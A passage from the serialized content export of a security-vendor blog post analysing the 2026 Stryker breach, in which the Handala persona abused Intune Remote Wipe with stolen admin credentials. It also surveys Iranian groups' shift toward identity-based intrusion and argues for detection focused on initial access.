Now","content:blog:tiktok-phishing.json","blog/tiktok-phishing.json","blog/tiktok-phishing",{"_path":9840,"_dir":1242,"_draft":6,"_partial":6,"_locale":31,"sys":9841,"ogImage":118,"summary":9844,"title":9855,"subtitle":118,"metaTitle":9856,"synopsis":9857,"hashTags":118,"publishedDate":9858,"slug":9859,"tagsCollection":9860,"content":9866,"authorsCollection":10812,"relatedBlogPostsCollection":10816,"_id":12929,"_type":6653,"_source":6654,"_file":12930,"_stem":12931,"_extension":6653},"/blog/stryker-handala-report",{"id":9842,"publishedAt":9843},"10hUzI9iiY8fFtmlA0M9Ne","2026-03-25T11:55:19.329Z",{"json":9845},{"data":9846,"content":9847,"nodeType":1259},{},[9848],{"data":9849,"content":9850,"nodeType":1258},{},[9851],{"data":9852,"marks":9853,"value":9854,"nodeType":1257},{},[],"The Stryker breach doesn't track with Handala's historical TTPs. This shows just how quickly the default attacker toolkit is evolving, and is a wake-up call for defenders.","The Stryker breach didn't match the playbook. That shouldn't be a surprise.","Analyzing Iran-nexus TTP evolution in 2026","Analysing the Stryker breach in line with recent changes to the Iran-nexus cyber playbook.","2026-03-19T00:00:00.000Z","stryker-handala-report",{"items":9861},[9862,9864],{"sys":9863,"name":1270},{"id":1269},{"sys":9865,"name":1274},{"id":1273},{"json":9867,"links":10773},{"nodeType":1259,"data":9868,"content":9869},{},[9870,9877,9883,9902,9905,9913,9920,9927,9930,9938,9945,10121,10128,10135,10138,10146,10153,10160,10167,10174,10177,10185,10204,10211,10219,10226,10371,10390,10398,10405,10540,10559,10565,10568,10576,10583,10590,10597,10600,10608,10648,10679,10686,10691,10694,10702,10709,10716,10723,10726,10733,10740],{"nodeType":1258,"data":9871,"content":9872},{},[9873],{"nodeType":1257,"value":9874,"marks":9875,"data":9876},"On the morning of March 11, employees at Stryker Corporation offices across 79 countries turned on their laptops and found them wiped and unusable. Personal phones enrolled in the company's BYOD programme had been factory reset overnight, taking photos, banking apps, and authenticator tokens with them. Login pages had also been defaced with the logo of Handala, a persona operated by Iran's Ministry of Intelligence and Security (MOIS).",[],{},{"nodeType":1335,"data":9878,"content":9882},{"target":9879},{"sys":9880},{"id":9881,"type":1340,"linkType":1341},"6JtlGFq0RDoW9g6zyAcPvn",[],{"nodeType":1258,"data":9884,"content":9885},{},[9886,9890,9898],{"nodeType":1257,"value":9887,"marks":9888,"data":9889},"In a break from the standard Handala playbook, there was no ransomware, no malware, and no exploit chain. The attacker ",[],{},{"nodeType":1364,"data":9891,"content":9893},{"uri":9892},"https://www.bleepingcomputer.com/news/security/stryker-attack-wiped-tens-of-thousands-of-devices-no-malware-needed/",[9894],{"nodeType":1257,"value":9895,"marks":9896,"data":9897},"simply logged into Microsoft Intune",[],{},{"nodeType":1257,"value":9899,"marks":9900,"data":9901}," with compromised Global Administrator credentials, abused a legitimate feature, and wiped over 80,000 systems, servers, and mobile devices.",[],{},{"nodeType":1307,"data":9903,"content":9904},{},[],{"nodeType":1311,"data":9906,"content":9907},{},[9908],{"nodeType":1257,"value":9909,"marks":9910,"data":9912},"What a Handala attack was supposed to look like",[9911],{"type":1318},{},{"nodeType":1258,"data":9914,"content":9915},{},[9916],{"nodeType":1257,"value":9917,"marks":9918,"data":9919},"Handala has a reputation for being a manual, hands-on intrusion team whose TTPs have typically included VPN credential brute-force for initial access (hundreds of logon attempts from commercial VPN nodes), supply chain compromise via managed service providers, RDP as the primary lateral movement method, ADRecon for Active Directory enumeration, LSASS credential dumping via comsvcs.dll, and GPO logon scripts for wiper distribution.",[],{},{"nodeType":1258,"data":9921,"content":9922},{},[9923],{"nodeType":1257,"value":9924,"marks":9925,"data":9926},"If you had invested in detection logic around Handala's documented toolkit (BiBi Wiper file extensions, Cl Wiper's EldoS RawDisk driver calls, No-Justice partition table manipulation, Karma Shell's Base64-with-XOR web shell patterns) none of it would have fired. Wiper malware signatures, web shell indicators, RawDisk driver loading, MBR/GPT manipulation, SharePoint exploitation patterns, anomalous RDP/SMB lateral movement: all reasonable detection priorities given the group's threat intelligence profile, but all irrelevant when it mattered most.",[],{},{"nodeType":1307,"data":9928,"content":9929},{},[],{"nodeType":1311,"data":9931,"content":9932},{},[9933],{"nodeType":1257,"value":9934,"marks":9935,"data":9937},"What Handala actually did",[9936],{"type":1318},{},{"nodeType":1258,"data":9939,"content":9940},{},[9941],{"nodeType":1257,"value":9942,"marks":9943,"data":9944},"The Stryker attack departs from the documented baseline across the kill chain.",[],{},{"nodeType":4291,"data":9946,"content":9947},{},[9948,9985,10022,10055,10088],{"nodeType":4295,"data":9949,"content":9950},{},[9951,9963,9974],{"nodeType":9952,"data":9953,"content":9954},"table-header-cell",{},[9955],{"nodeType":1258,"data":9956,"content":9957},{},[9958],{"nodeType":1257,"value":9959,"marks":9960,"data":9962},"Kill chain phase",[9961],{"type":1318},{},{"nodeType":9952,"data":9964,"content":9965},{},[9966],{"nodeType":1258,"data":9967,"content":9968},{},[9969],{"nodeType":1257,"value":9970,"marks":9971,"data":9973},"Historical TTP",[9972],{"type":1318},{},{"nodeType":9952,"data":9975,"content":9976},{},[9977],{"nodeType":1258,"data":9978,"content":9979},{},[9980],{"nodeType":1257,"value":9981,"marks":9982,"data":9984},"Stryker TTP",[9983],{"type":1318},{},{"nodeType":4295,"data":9986,"content":9987},{},[9988,9998,10008],{"nodeType":4299,"data":9989,"content":9990},{},[9991],{"nodeType":1258,"data":9992,"content":9993},{},[9994],{"nodeType":1257,"value":9995,"marks":9996,"data":9997},"Initial access",[],{},{"nodeType":4299,"data":9999,"content":10000},{},[10001],{"nodeType":1258,"data":10002,"content":10003},{},[10004],{"nodeType":1257,"value":10005,"marks":10006,"data":10007},"VPN credential brute-force, supply chain compromise of managed service providers and IT vendors, spearphishing with wiper delivery, exploitation of SharePoint and Windows server vulnerabilities",[],{},{"nodeType":4299,"data":10009,"content":10010},{},[10011],{"nodeType":1258,"data":10012,"content":10013},{},[10014,10018],{"nodeType":1257,"value":10015,"marks":10016,"data":10017},"I",[],{},{"nodeType":1257,"value":10019,"marks":10020,"data":10021},"dentity compromise targeting Microsoft Entra ID",[],{},{"nodeType":4295,"data":10023,"content":10024},{},[10025,10035,10045],{"nodeType":4299,"data":10026,"content":10027},{},[10028],{"nodeType":1258,"data":10029,"content":10030},{},[10031],{"nodeType":1257,"value":10032,"marks":10033,"data":10034},"Persistence",[],{},{"nodeType":4299,"data":10036,"content":10037},{},[10038],{"nodeType":1258,"data":10039,"content":10040},{},[10041],{"nodeType":1257,"value":10042,"marks":10043,"data":10044},"Web shells (Karma Shell, reGeorg)",[],{},{"nodeType":4299,"data":10046,"content":10047},{},[10048],{"nodeType":1258,"data":10049,"content":10050},{},[10051],{"nodeType":1257,"value":10052,"marks":10053,"data":10054},"Global Administrator access to cloud tenant, no persistence mechanism needed",[],{},{"nodeType":4295,"data":10056,"content":10057},{},[10058,10068,10078],{"nodeType":4299,"data":10059,"content":10060},{},[10061],{"nodeType":1258,"data":10062,"content":10063},{},[10064],{"nodeType":1257,"value":10065,"marks":10066,"data":10067},"Lateral movement",[],{},{"nodeType":4299,"data":10069,"content":10070},{},[10071],{"nodeType":1258,"data":10072,"content":10073},{},[10074],{"nodeType":1257,"value":10075,"marks":10076,"data":10077},"RDP, SMB, FTP, Mimikatz",[],{},{"nodeType":4299,"data":10079,"content":10080},{},[10081],{"nodeType":1258,"data":10082,"content":10083},{},[10084],{"nodeType":1257,"value":10085,"marks":10086,"data":10087},"None required, Intune console provides global reach from a single session",[],{},{"nodeType":4295,"data":10089,"content":10090},{},[10091,10101,10111],{"nodeType":4299,"data":10092,"content":10093},{},[10094],{"nodeType":1258,"data":10095,"content":10096},{},[10097],{"nodeType":1257,"value":10098,"marks":10099,"data":10100},"Impact",[],{},{"nodeType":4299,"data":10102,"content":10103},{},[10104],{"nodeType":1258,"data":10105,"content":10106},{},[10107],{"nodeType":1257,"value":10108,"marks":10109,"data":10110},"Custom wiper malware (BiBi, Cl Wiper, No-Justice, Hatef)",[],{},{"nodeType":4299,"data":10112,"content":10113},{},[10114],{"nodeType":1258,"data":10115,"content":10116},{},[10117],{"nodeType":1257,"value":10118,"marks":10119,"data":10120},"Microsoft Intune Remote Wipe, a legitimate built-in administrative feature",[],{},{"nodeType":1258,"data":10122,"content":10123},{},[10124],{"nodeType":1257,"value":10125,"marks":10126,"data":10127},"An organisation with detections built around malware signatures, file system manipulation, and anomalous process execution would be unprepared for an attack with zero malware artifacts, where every action was a legitimate administrative command.",[],{},{"nodeType":1258,"data":10129,"content":10130},{},[10131],{"nodeType":1257,"value":10132,"marks":10133,"data":10134},"But while the methods were different, the core objective — mass destruction of data — is entirely consistent with previous campaigns, just through a legitimate management plane rather than custom malware.",[],{},{"nodeType":1307,"data":10136,"content":10137},{},[],{"nodeType":1311,"data":10139,"content":10140},{},[10141],{"nodeType":1257,"value":10142,"marks":10143,"data":10145},"The kill chain looks different now",[10144],{"type":1318},{},{"nodeType":1258,"data":10147,"content":10148},{},[10149],{"nodeType":1257,"value":10150,"marks":10151,"data":10152},"The attack path was devastatingly simple. It didn't require lateral movement because there was nothing to move laterally through. It didn't require privilege escalation because they directly compromised a global administrator account. Every device managed by Intune was already within reach.",[],{},{"nodeType":1258,"data":10154,"content":10155},{},[10156],{"nodeType":1257,"value":10157,"marks":10158,"data":10159},"The traditional network-centric kill chain collapses into: compromise identity, access management plane, execute objective.",[],{},{"nodeType":1258,"data":10161,"content":10162},{},[10163],{"nodeType":1257,"value":10164,"marks":10165,"data":10166},"This is not specific to Iran-aligned actors. Russian groups are leveraging AITM phishing kits and abusing Microsoft 365 OAuth tokens via consent attacks. Scattered Spider built an operational model around social engineering and SSO account takeover. And now Handala has demonstrated that a nation-state destructive operation can be executed entirely by abusing legitimate enterprise tooling.",[],{},{"nodeType":1258,"data":10168,"content":10169},{},[10170],{"nodeType":1257,"value":10171,"marks":10172,"data":10173},"This kind of attack is more direct, faster to execute, and carries a significantly lower barrier to entry. You don't need custom malware and exploit development when you can log in using as-a-Service kits or partner with an access brokering specialist.",[],{},{"nodeType":1307,"data":10175,"content":10176},{},[],{"nodeType":1311,"data":10178,"content":10179},{},[10180],{"nodeType":1257,"value":10181,"marks":10182,"data":10184},"The big picture of Iranian cyber TTPs",[10183],{"type":1318},{},{"nodeType":1258,"data":10186,"content":10187},{},[10188,10192,10200],{"nodeType":1257,"value":10189,"marks":10190,"data":10191},"Iran's offensive cyber capability is split between two rival intelligence bureaucracies. The Ministry of Intelligence and Security (MOIS) runs groups like APT34, MuddyWater, Scarred Manticore, and Void Manticore (Handala), which tend toward long-dwell espionage and coordinated destructive operations, often using a ",[],{},{"nodeType":1364,"data":10193,"content":10195},{"uri":10194},"https://research.checkpoint.com/2024/bad-karma-no-justice-void-manticore-destructive-activities-in-israel/",[10196],{"nodeType":1257,"value":10197,"marks":10198,"data":10199},"documented dual-actor handoff model",[],{},{"nodeType":1257,"value":10201,"marks":10202,"data":10203}," where Scarred Manticore conducts stealthy espionage before handing targets to Void Manticore (Handala) for destruction.",[],{},{"nodeType":1258,"data":10205,"content":10206},{},[10207],{"nodeType":1257,"value":10208,"marks":10209,"data":10210},"The Islamic Revolutionary Guard Corps (IRGC) runs a wider set of groups, including APT33/Peach Sandstorm, APT35/Charming Kitten, APT42, Tortoiseshell/Imperial Kitten, Cotton Sandstorm, and CyberAv3ngers. IRGC groups cover espionage, destructive attacks, influence operations, election interference, ICS targeting across U.S. water and wastewater facilities), and individual surveillance.",[],{},{"nodeType":1468,"data":10212,"content":10213},{},[10214],{"nodeType":1257,"value":10215,"marks":10216,"data":10218},"IRGC groups have already shifted to identity-first TTPs",[10217],{"type":1318},{},{"nodeType":1258,"data":10220,"content":10221},{},[10222],{"nodeType":1257,"value":10223,"marks":10224,"data":10225},"On the IRGC side, the shift toward identity-centric operations is well-documented:",[],{},{"nodeType":1884,"data":10227,"content":10228},{},[10229,10280,10318,10345],{"nodeType":1888,"data":10230,"content":10231},{},[10232],{"nodeType":1258,"data":10233,"content":10234},{},[10235,10240,10244,10252,10256,10264,10268,10276],{"nodeType":1257,"value":10236,"marks":10237,"data":10239},"APT33/Peach Sandstorm",[10238],{"type":1318},{},{"nodeType":1257,"value":10241,"marks":10242,"data":10243}," shifted decisively toward credential-based initial access starting in early 2023, with Microsoft ",[],{},{"nodeType":1364,"data":10245,"content":10247},{"uri":10246},"https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/",[10248],{"nodeType":1257,"value":10249,"marks":10250,"data":10251},"documenting",[],{},{"nodeType":1257,"value":10253,"marks":10254,"data":10255}," large-scale password spray campaigns targeting thousands of organisations, ",[],{},{"nodeType":1364,"data":10257,"content":10259},{"uri":10258},"https://www.bleepingcomputer.com/news/security/iranian-hackers-breach-defense-orgs-in-password-spray-attacks/",[10260],{"nodeType":1257,"value":10261,"marks":10262,"data":10263},"Golden SAML",[],{},{"nodeType":1257,"value":10265,"marks":10266,"data":10267}," attacks for persistent cloud access, and the use of ",[],{},{"nodeType":1364,"data":10269,"content":10271},{"uri":10270},"https://www.microsoft.com/en-us/security/blog/2024/08/28/peach-sandstorm-deploys-new-custom-tickler-malware-in-long-running-intelligence-gathering-operations/",[10272],{"nodeType":1257,"value":10273,"marks":10274,"data":10275},"fraudulent Azure subscriptions",[],{},{"nodeType":1257,"value":10277,"marks":10278,"data":10279}," for C2 infrastructure.",[],{},{"nodeType":1888,"data":10281,"content":10282},{},[10283],{"nodeType":1258,"data":10284,"content":10285},{},[10286,10291,10294,10302,10306,10314],{"nodeType":1257,"value":10287,"marks":10288,"data":10290},"APT42",[10289],{"type":1318},{},{"nodeType":1257,"value":3548,"marks":10292,"data":10293},[],{},{"nodeType":1364,"data":10295,"content":10297},{"uri":10296},"https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations",[10298],{"nodeType":1257,"value":10299,"marks":10300,"data":10301},"assessed by Mandiant to operate on behalf of the IRGC-IO, ",[],{},{"nodeType":1257,"value":10303,"marks":10304,"data":10305},"has made credential harvesting and MFA bypass its core competency, operating almost entirely within cloud environments post-compromise and ",[],{},{"nodeType":1364,"data":10307,"content":10309},{"uri":10308},"https://cloud.google.com/blog/topics/threat-intelligence/apt42-charms-cons-compromises",[10310],{"nodeType":1257,"value":10311,"marks":10312,"data":10313},"registering its own Microsoft Authenticator",[],{},{"nodeType":1257,"value":10315,"marks":10316,"data":10317}," on compromised accounts for persistent access.",[],{},{"nodeType":1888,"data":10319,"content":10320},{},[10321],{"nodeType":1258,"data":10322,"content":10323},{},[10324,10329,10333,10341],{"nodeType":1257,"value":10325,"marks":10326,"data":10328},"APT35",[10327],{"type":1318},{},{"nodeType":1257,"value":10330,"marks":10331,"data":10332}," (aka Imperial Kitten/Tortoiseshell) was observed ",[],{},{"nodeType":1364,"data":10334,"content":10336},{"uri":10335},"https://www.crowdstrike.com/explore/2026-global-threat-report?utm_medium=org",[10337],{"nodeType":1257,"value":10338,"marks":10339,"data":10340},"targeting cloud identities in November 2025",[],{},{"nodeType":1257,"value":10342,"marks":10343,"data":10344},", deploying the Evilginx2 AitM toolkit against Microsoft 365 users in Israel.",[],{},{"nodeType":1888,"data":10346,"content":10347},{},[10348],{"nodeType":1258,"data":10349,"content":10350},{},[10351,10356,10360,10367],{"nodeType":1257,"value":10352,"marks":10353,"data":10355},"CrustyKrill",[10354],{"type":1318},{},{"nodeType":1257,"value":10357,"marks":10358,"data":10359}," (TA455/Smoke Sandstorm) ",[],{},{"nodeType":1364,"data":10361,"content":10362},{"uri":10335},[10363],{"nodeType":1257,"value":10364,"marks":10365,"data":10366},"uses fake Google Meet and Microsoft Teams pages",[],{},{"nodeType":1257,"value":10368,"marks":10369,"data":10370}," with a live operator intercepting 2FA codes in real time, alongside Azure Web Apps for C2.",[],{},{"nodeType":1258,"data":10372,"content":10373},{},[10374,10378,10386],{"nodeType":1257,"value":10375,"marks":10376,"data":10377},"A ",[],{},{"nodeType":1364,"data":10379,"content":10381},{"uri":10380},"https://media.defense.gov/2024/Oct/16/2003565317/-1/-1/0/CSA-IRAN-CYBER-BRUTE-FORCE-CRITICAL-INFRASTRUCTURE-ORGS.PDF",[10382],{"nodeType":1257,"value":10383,"marks":10384,"data":10385},"joint advisory from six nations",[],{},{"nodeType":1257,"value":10387,"marks":10388,"data":10389}," (FBI, CISA, NSA, CSE, AFP, ASD, advisory AA24-290A, October 2024) confirmed the pattern at the government level, documenting Iranian actors using brute force, password spraying, and MFA push bombing to compromise critical infrastructure accounts since October 2023, and assessing that the actors sell this access on cybercriminal forums.",[],{},{"nodeType":1468,"data":10391,"content":10392},{},[10393],{"nodeType":1257,"value":10394,"marks":10395,"data":10397},"MOIS groups are changing their approach too",[10396],{"type":1318},{},{"nodeType":1258,"data":10399,"content":10400},{},[10401],{"nodeType":1257,"value":10402,"marks":10403,"data":10404},"On the MOIS side, the documented TTP baseline has historically centred on custom malware, network-level persistence, and exploitation of on-premises infrastructure. But identity compromise, particularly credential theft, has been a consistent thread across broader MOIS groups too:",[],{},{"nodeType":1884,"data":10406,"content":10407},{},[10408,10447,10474,10525],{"nodeType":1888,"data":10409,"content":10410},{},[10411],{"nodeType":1258,"data":10412,"content":10413},{},[10414,10419,10423,10431,10435,10443],{"nodeType":1257,"value":10415,"marks":10416,"data":10418},"APT34 (OilRig) ",[10417],{"type":1318},{},{"nodeType":1257,"value":10420,"marks":10421,"data":10422},"built its reputation on DNS tunnelling and custom backdoors, but its initial access methods include spearphishing and fake VPN portals for credential harvesting. Its 2024 campaigns introduced ",[],{},{"nodeType":1364,"data":10424,"content":10426},{"uri":10425},"https://www.trendmicro.com/en_us/research/24/j/earth-simnavaz-cyberattacks.html",[10427],{"nodeType":1257,"value":10428,"marks":10429,"data":10430},"password filter DLLs",[],{},{"nodeType":1257,"value":10432,"marks":10433,"data":10434}," registered at the domain controller level to intercept plaintext credentials during password change events, with the ",[],{},{"nodeType":1364,"data":10436,"content":10438},{"uri":10437},"https://www.bleepingcomputer.com/news/security/oilrig-hackers-now-exploit-windows-flaw-to-elevate-privileges/",[10439],{"nodeType":1257,"value":10440,"marks":10441,"data":10442},"STEALHOOK backdoor",[],{},{"nodeType":1257,"value":10444,"marks":10445,"data":10446}," exfiltrating stolen domain credentials via compromised Exchange servers. Cloud-based downloaders leveraging OneDrive and Microsoft Graph API were active against Israeli targets from 2022 to 2024.",[],{},{"nodeType":1888,"data":10448,"content":10449},{},[10450],{"nodeType":1258,"data":10451,"content":10452},{},[10453,10458,10462,10470],{"nodeType":1257,"value":10454,"marks":10455,"data":10457},"APT39 (Chafer) ",[10456],{"type":1318},{},{"nodeType":1257,"value":10459,"marks":10460,"data":10461},"operated through the ",[],{},{"nodeType":1364,"data":10463,"content":10465},{"uri":10464},"https://home.treasury.gov/news/press-releases/sm1127",[10466],{"nodeType":1257,"value":10467,"marks":10468,"data":10469},"sanctioned front company Rana Intelligence Computing",[],{},{"nodeType":1257,"value":10471,"marks":10472,"data":10473},", focuses on surveillance and tracking of individuals, using credential harvesting through spoofed airline and telecom domains across 30+ countries.",[],{},{"nodeType":1888,"data":10475,"content":10476},{},[10477],{"nodeType":1258,"data":10478,"content":10479},{},[10480,10485,10489,10497,10501,10509,10513,10521],{"nodeType":1257,"value":10481,"marks":10482,"data":10484},"MuddyWater",[10483],{"type":1318},{},{"nodeType":1257,"value":10486,"marks":10487,"data":10488},", confirmed by a ",[],{},{"nodeType":1364,"data":10490,"content":10492},{"uri":10491},"https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-055a",[10493],{"nodeType":1257,"value":10494,"marks":10495,"data":10496},"joint CISA/FBI/NSA/NCSC advisory",[],{},{"nodeType":1257,"value":10498,"marks":10499,"data":10500}," as a subordinate element of MOIS, functions as an initial access broker within the ecosystem. Its operations rely on spearphishing and abuse of legitimate RMM tools, but the group has developed ",[],{},{"nodeType":1364,"data":10502,"content":10504},{"uri":10503},"https://thehackernews.com/2025/12/iran-linked-hackers-hits-israeli_2.html",[10505],{"nodeType":1257,"value":10506,"marks":10507,"data":10508},"dedicated credential stealers",[],{},{"nodeType":1257,"value":10510,"marks":10511,"data":10512}," including CE-Notes (which bypasses Chrome's app-bound encryption), Blub (a multi-browser credential extractor), and LP-Notes (fake Windows Security dialogs to capture system credentials). A parallel campaign documented by ",[],{},{"nodeType":1364,"data":10514,"content":10516},{"uri":10515},"https://www.group-ib.com/blog/muddywater-espionage/",[10517],{"nodeType":1257,"value":10518,"marks":10519,"data":10520},"Group-IB",[],{},{"nodeType":1257,"value":10522,"marks":10523,"data":10524}," found the group deploying a custom Chromium credential stealer alongside its Phoenix backdoor.",[],{},{"nodeType":1888,"data":10526,"content":10527},{},[10528],{"nodeType":1258,"data":10529,"content":10530},{},[10531,10536],{"nodeType":1257,"value":10532,"marks":10533,"data":10535},"Lyceum (Hexane)",[10534],{"type":1318},{},{"nodeType":1257,"value":10537,"marks":10538,"data":10539}," overlaps operationally with APT34 and uses password spraying and brute-force attacks for initial access, and notably probed Albanian government infrastructure ahead of Handala destructive attacks in 2022, illustrating the collaborative model across MOIS groups.",[],{},{"nodeType":1258,"data":10541,"content":10542},{},[10543,10547,10555],{"nodeType":1257,"value":10544,"marks":10545,"data":10546},"Check Point has also ",[],{},{"nodeType":1364,"data":10548,"content":10550},{"uri":10549},"https://research.checkpoint.com/2026/iranian-mois-actors-the-cyber-crime-connection/",[10551],{"nodeType":1257,"value":10552,"marks":10553,"data":10554},"documented",[],{},{"nodeType":1257,"value":10556,"marks":10557,"data":10558}," a broader pattern of MOIS actors engaging directly with the criminal ecosystem, including Handala's adoption of the Rhadamanthys commercial infostealer and Iranian-affiliated operators working through the Qilin ransomware-as-a-service infrastructure.",[],{},{"nodeType":1335,"data":10560,"content":10564},{"target":10561},{"sys":10562},{"id":10563,"type":1340,"linkType":1341},"2SFtROFuPZ4SPTL87Vpjr9",[],{"nodeType":1307,"data":10566,"content":10567},{},[],{"nodeType":1311,"data":10569,"content":10570},{},[10571],{"nodeType":1257,"value":10572,"marks":10573,"data":10575},"The problem with over-indexing on TTPs",[10574],{"type":1318},{},{"nodeType":1258,"data":10577,"content":10578},{},[10579],{"nodeType":1257,"value":10580,"marks":10581,"data":10582},"Threat intelligence has real value. Attributing campaigns to named groups, mapping their techniques to MITRE ATT&CK, and generating detection rules gives defenders a meaningful starting point. The problem is treating a specific actor's historical TTP catalogue as the primary basis for detection logic, rather than combining it with the broader trends in attacker behaviour visible across the entire landscape.",[],{},{"nodeType":1258,"data":10584,"content":10585},{},[10586],{"nodeType":1257,"value":10587,"marks":10588,"data":10589},"Operators are creative and pragmatic. If the path of least resistance is a compromised admin credential and a legitimate MDM feature, no serious attacker is going to deploy custom wiper malware instead because that's what they used last time.",[],{},{"nodeType":1258,"data":10591,"content":10592},{},[10593],{"nodeType":1257,"value":10594,"marks":10595,"data":10596},"If your threat model says you're a plausible target for an Iranian threat group, and the trend data tells you that identity compromise is the most common initial access method across all actors, the rational response is to evaluate your controls aligned to identity-based initial access, not just deploy signatures for BiBi Wiper. When the specific actor profile crowds out the general trend data, you end up building defences against the last attack and leaving yourself exposed to the shift that every actor is going through.",[],{},{"nodeType":1307,"data":10598,"content":10599},{},[],{"nodeType":1311,"data":10601,"content":10602},{},[10603],{"nodeType":1257,"value":10604,"marks":10605,"data":10607},"Evaluating the security guidance",[10606],{"type":1318},{},{"nodeType":1258,"data":10609,"content":10610},{},[10611,10615,10623,10627,10635,10639,10644],{"nodeType":1257,"value":10612,"marks":10613,"data":10614},"In the wake of the breach, industry guidance has settled around enforcing phishing-resistant MFA on privileged accounts, implementing just-in-time privilege activation via ",[],{},{"nodeType":1364,"data":10616,"content":10618},{"uri":10617},"https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-configure",[10619],{"nodeType":1257,"value":10620,"marks":10621,"data":10622},"PIM",[],{},{"nodeType":1257,"value":10624,"marks":10625,"data":10626},", enabling ",[],{},{"nodeType":1364,"data":10628,"content":10630},{"uri":10629},"https://learn.microsoft.com/en-us/intune/intune-service/fundamentals/multi-admin-approval",[10631],{"nodeType":1257,"value":10632,"marks":10633,"data":10634},"Multi Admin Approval ",[],{},{"nodeType":1257,"value":10636,"marks":10637,"data":10638},"for high-risk Intune operations, configuring anomaly alerting on bulk device actions, and segregating administrative identities from everyday user accounts. This is all sound advice, but these recommendations are designed to limit what an attacker can do ",[],{},{"nodeType":1257,"value":10640,"marks":10641,"data":10643},"after",[10642],{"type":191},{},{"nodeType":1257,"value":10645,"marks":10646,"data":10647}," an account has already been compromised — introducing friction, but not blocking them entirely.",[],{},{"nodeType":1258,"data":10649,"content":10650},{},[10651,10655,10663,10667,10675],{"nodeType":1257,"value":10652,"marks":10653,"data":10654},"The detection challenges compound this. Entra ID sign-in logs and ",[],{},{"nodeType":1364,"data":10656,"content":10658},{"uri":10657},"https://www.a6n.co.uk/2025/11/tracking-device-wipes-in-microsoft.html",[10659],{"nodeType":1257,"value":10660,"marks":10661,"data":10662},"Intune audit logs exist in separate systems",[],{},{"nodeType":1257,"value":10664,"marks":10665,"data":10666}," with separate correlation IDs. Tracing a sign-in to a subsequent device action requires deliberate log integration that many organisations haven't implemented. The ",[],{},{"nodeType":1364,"data":10668,"content":10670},{"uri":10669},"https://learn.microsoft.com/en-us/intune/intune-service/fundamentals/monitor-audit-logs",[10671],{"nodeType":1257,"value":10672,"marks":10673,"data":10674},"logs do record",[],{},{"nodeType":1257,"value":10676,"marks":10677,"data":10678}," \"wipe ManagedDevice\" events, but may not be linked to real-time alerting. And the underlying action, Intune's Remote Wipe, is a legitimate feature used routinely in enterprise IT. Again, the attack could have succeeded even with these in place.",[],{},{"nodeType":1258,"data":10680,"content":10681},{},[10682],{"nodeType":1257,"value":10683,"marks":10684,"data":10685},"In a world where a compromised account can be rapidly exploited, it's vital to focus on improving detection and prevention as early as possible in the kill chain — combating initial access techniques themselves.",[],{},{"nodeType":1335,"data":10687,"content":10690},{"target":10688},{"sys":10689},{"id":9489,"type":1340,"linkType":1341},[],{"nodeType":1307,"data":10692,"content":10693},{},[],{"nodeType":1311,"data":10695,"content":10696},{},[10697],{"nodeType":1257,"value":10698,"marks":10699,"data":10701},"Closing thoughts",[10700],{"type":1318},{},{"nodeType":1258,"data":10703,"content":10704},{},[10705],{"nodeType":1257,"value":10706,"marks":10707,"data":10708},"The Stryker attack reflects what attackers everywhere — from financially motivated criminal groups to more destructive nation-state operators — are already doing. Identity-based initial access, abuse of legitimate tools and services, and living-off-the-land execution are the current standard operating procedure.",[],{},{"nodeType":1258,"data":10710,"content":10711},{},[10712],{"nodeType":1257,"value":10713,"marks":10714,"data":10715},"Even with a perfectly hardened environment, most public breaches today involve attackers hijacking SSO mechanisms to move into connected applications, exfiltrating data for resale or extortion, and in some cases leveraging cloud services and admin platforms to deploy ransomware (the Scattered Spider playbook of dropping ransomware via VMware management portal being a well-documented example).",[],{},{"nodeType":1258,"data":10717,"content":10718},{},[10719],{"nodeType":1257,"value":10720,"marks":10721,"data":10722},"The majority of attackers will have no interest in destructively wiping an Intune environment — that's difficult to monetize. But the techniques that enabled the Stryker wipe are the same as those that enable financially motivated breaches at scale, pointing to a challenge that extends well beyond Iran-nexus threat actors and MDM hardening.",[],{},{"nodeType":1307,"data":10724,"content":10725},{},[],{"nodeType":1311,"data":10727,"content":10728},{},[10729],{"nodeType":1257,"value":9670,"marks":10730,"data":10732},[10731],{"type":1318},{},{"nodeType":1258,"data":10734,"content":10735},{},[10736],{"nodeType":1257,"value":10737,"marks":10738,"data":10739},"Push Security's browser-based security platform provides comprehensive detection and response capabilities against the leading cause of breaches. Push blocks browser-based attacks like AiTM phishing, credential stuffing, malicious browser extensions, ClickFix, and session hijacking. You don't need to wait until it all goes wrong — you can also use Push to proactively find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, and more to harden your identity attack surface.",[],{},{"nodeType":1258,"data":10741,"content":10742},{},[10743,10746,10752,10755,10761,10764,10770],{"nodeType":1257,"value":2223,"marks":10744,"data":10745},[],{},{"nodeType":1364,"data":10747,"content":10748},{"uri":2228},[10749],{"nodeType":1257,"value":2231,"marks":10750,"data":10751},[],{},{"nodeType":1257,"value":3548,"marks":10753,"data":10754},[],{},{"nodeType":1364,"data":10756,"content":10757},{"uri":3737},[10758],{"nodeType":1257,"value":6347,"marks":10759,"data":10760},[],{},{"nodeType":1257,"value":3744,"marks":10762,"data":10763},[],{},{"nodeType":1364,"data":10765,"content":10766},{"uri":2241},[10767],{"nodeType":1257,"value":2244,"marks":10768,"data":10769},[],{},{"nodeType":1257,"value":2249,"marks":10771,"data":10772},[],{},{"entries":10774},{"hyperlink":10775,"inline":10776,"block":10777},[],[],[10778,10792,10810],{"sys":10779,"__typename":6371,"content":10780,"name":10791,"title":118},{"id":9881},{"json":10781},{"nodeType":1259,"data":10782,"content":10783},{},[10784],{"nodeType":1258,"data":10785,"content":10786},{},[10787],{"nodeType":1257,"value":10788,"marks":10789,"data":10790},"Handala is a public-facing \"faketivist\" persona, also known as Handala Hack Team, Void Manticore, Storm-0842, Dune, Red Sandstorm, and Banished Kitten. The group also operates under regional personas like Karma and Homeland Justice. We'll refer to them as Handala in this piece.",[],{},"Handala blog insight box 1",{"sys":10793,"__typename":6371,"content":10794,"name":10809,"title":118},{"id":10563},{"json":10795},{"nodeType":1259,"data":10796,"content":10797},{},[10798],{"nodeType":1258,"data":10799,"content":10800},{},[10801,10805],{"nodeType":1257,"value":10802,"marks":10803,"data":10804},"So, t",[],{},{"nodeType":1257,"value":10806,"marks":10807,"data":10808},"he Stryker attack path is operationally consistent with the direction the Iranian 